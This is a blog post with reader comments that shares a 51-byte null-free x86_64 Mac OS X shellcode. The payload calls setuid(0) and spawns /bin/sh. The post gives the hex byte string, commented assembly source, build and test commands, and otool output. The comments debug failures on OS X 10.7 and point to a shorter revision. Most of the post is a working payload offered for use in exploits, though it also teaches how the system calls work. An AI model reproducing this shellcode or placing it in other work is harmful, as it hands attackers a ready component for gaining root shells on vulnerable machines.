Just Arrived: Malware Analyst’s Cookbook »

51 Byte x86_64 OS X Null Free Shellcode

It doesn’t seem like there’s a lot of x86_64 bit shellcode out there for the Intel Mac platforms so I figured I’d write my own and share it. I’m using Mac OS X 10.6.5 at the time of this post.

Shellcode

Instead of starting with the source and ending with the shellcode, we’re going to throw this one in reverse and get right to the shellcode. So here you have it, a 51 byte Mac OS X 64 bit setuid/shell-spawning shellcode

/*
 * Name: setuid_shell_x86_64
 * Qualities: Null-Free
 * Platforms: Mac OS X / Intel x86_64
 *
 *  Created on: Nov 25, 2010
 *      Author: Dustin Schultz - TheXploit.com
 */
char shellcode[] =
"\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17\x31\xff\x4c\x89\xc0"
"\x0f\x05\xeb\x12\x5f\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x52"
"\x57\x48\x89\xe6\x0f\x05\xe8\xe9\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x2f\x73\x68";

Source

And now for the source in NASM/YASM syntax. If you’ve never done system calls on 64bit OS X and you’re confused, be sure to read my post on 64 bit system calls in os x.

; File: setuid_shell_x86_64.asm
; Author: Dustin Schultz - TheXploit.com
BITS 64

section .text
global start

start:
a:
 mov r8b, 0x02          ; Unix class system calls = 2
 shl r8, 24             ; shift left 24 to the upper order bits
 or r8, 0x17            ; setuid = 23, or with class = 0x2000017
 xor edi, edi           ; zero out edi
 mov rax, r8            ; syscall number in rax
 syscall                ; invoke kernel
 jmp short c            ; jump to c
b:
 pop rdi                ; pop ret addr which = addr of /bin/sh
 add r8, 0x24           ; execve = 59, 0x24+r8=0x200003b
 mov rax, r8            ; syscall number in rax
 xor rdx, rdx           ; zero out rdx
 push rdx               ; null terminate rdi, pushed backwards
 push rdi               ; push rdi = pointer to /bin/sh
 mov rsi, rsp           ; pointer to null terminated /bin/sh string
 syscall                ; invoke the kernel
c:
 call b                 ; call b, push ret of /bin/sh
 db '/bin//sh'          ; /bin/sh string

I would never blindly use shellcode without testing it out my self (unless it’s from a trusted source like Metasploit)

nobody@nobody:~/$ nasm -f macho64 setuid_shell_x86_64.asm
nobody@nobody:~/$ ld -arch x86_64 setuid_shell_x86_64.o
nobody@nobody:~/$ ./a.out
sh-3.2$

And the final byte representation (verify against C source above)

nobody@nobody:~/$ otool -t setuid_shell_x86_64.o
setuid_shell_x86_64.o:
(__TEXT,__text) section
0000000000000000 41 b0 02 49 c1 e0 18 49 83 c8 17 31 ff 4c 89 c0
0000000000000010 0f 05 eb 12 5f 49 83 c0 24 4c 89 c0 48 31 d2 52
0000000000000020 57 48 89 e6 0f 05 e8 e9 ff ff ff 2f 62 69 6e 2f
0000000000000030 2f 73 68

And that’s all. Be sure to checkback in the future or subscribe to my RSS feed. I definitely have more shellcode to come!

programming shellcode

This entry was posted by Dustin Schultz on November 25, 2010 at 12:48 pm, and is filed under Security Development. Follow any responses to this post through RSS 2.0.You can leave a response or trackback from your own site.

Comments (14)
Pings (2)
Related Posts

#1 written by K3v1n 1 year ago

well put together. It works like a charm!!!

Reply Quote
#2 written by Me 11 months ago

I get:
setuid_shell_x86_64.o: file not recognized: File format not recognized

on ld command.

Any idea why?
I’m doing this on powerpc – ubuntu 10.04.2

Thanks

Reply Quote
#3 written by Dustin 11 months ago

Can you post the output of ‘file setuid_shell_x86_64.o’ ? Also, note that this is Intel shellcode. The registers on a PowerPC are going to be entirely different.

Reply Quote
#4 written by David 2 months ago

Hi! Thanks for your work, but I have a problem. When I execute the a.out file I get the following error: ‘Bad system call’.
~/Desktop/Overflow$ ld -arch x86_64 setuid_shell_x86_64.o
~/Desktop/Overflow$ ./a.out
Bad system call

But the otool output is correct, and when I test it in the way you explain in the next post, there are no problem, and the shell runs perfectly.

Have you any tought about this unexpected behaviour? I would like to know what’s happening with the a.out file.
Thank you for the blog, it’s very interesting and didactic.

Reply Quote
- #5 written by Dustin Schultz 1 month ago
  
  David, it looks like OS X updated some things with 10.7 that make this not work anymore. I’ll look into it and get back to you as soon as I can.
  
  Reply Quote
- #6 written by Dustin Schultz 1 month ago
  
  Ok it looks like it has something to do with the changes from 10.6.5 to 10.7 with the linker (ld). If you test the shellcode with C code, it’s still valid shellcode. Unfortunately, I can’t seem to figure out what changed and how to fix it..
  
  Reply Quote
  - #7 written by David 1 month ago
    
    Ok, thank you anyway. I appreciate your kindness
    
    By the way, I have a suggestion:
    I think that the instruction “xor edi, edi ; zero out edi” can be removed from the code.
    
    Goodbye!
    
    Reply Quote
    - #8 written by Dustin Schultz 1 month ago
      
      Hmm, interesting. edi in this case is for zero for setuid(0). Running the shellcode by itself without zeroing it out works but what if edi is dirtied by something else when you’re actually using the shellcode – you might get the wrong uid.
      
      Reply Quote
    - #9 written by Dustin Schultz 1 month ago
      
      Here’s an improved version that I’ve tested as working with ld on 10.7: http://thexploit.com/sec/45-byte-x86_64-os-x-setuid-execve-null-free-shellcode/
      
      Reply Quote
      - #10 written by alvasli 2 weeks ago
        
        This is really interesting. I see the same situation as David. When I test this 51 bytes shellcode on Mac OS X lion, I get “Bad system call: 12″. But when I put this 51 bytes shellcode within C code, it works fine as your blog “Testing Your Unix-Based Shellcode on a Non-Executable Stack or Heap” suggests.
        
        When I put your new 45 bytes shell code within C code to test, I get “Segmentation fault: 11″.
        
        I think I need to debug them with gdb and see what happen.
        
        Reply Quote
#11 written by alvasli 2 weeks ago

Before I fire up my gdb, I just realize that I put another comment on your other article, “Execve Syscall on OSX 10.7″. I mentioned that rsi is not initialized, this may cause some problem(even I haven’t debug the code to verify my conclusion).

I have the same idea: does the same this happens when I put your new 45 bytes shellcode within C.

I tried the shellcode which specifies rsi(in the comment of “Execve Syscall on OSX 10.7″). It comes out stirring. Yes, it works.

Reply Quote
- #12 written by Dustin Schultz 2 weeks ago
  
  Let me know if you figure anything out. I worked on this for a while and couldn’t figure it out. It’s strange that the shellcode still works when placed in memory and executed with C.
  
  Reply Quote
Type your comment
You may use these HTML tags: <a> <abbr> <acronym> <b> <blockquote> <cite> <code> <del> <em> <i> <q> <strike> <strong>
Comment Feed for this Post

Go to Top

51 Byte x86_64 OS X Null Free Shellcode

Shellcode

Source

Books on Security

Other Posts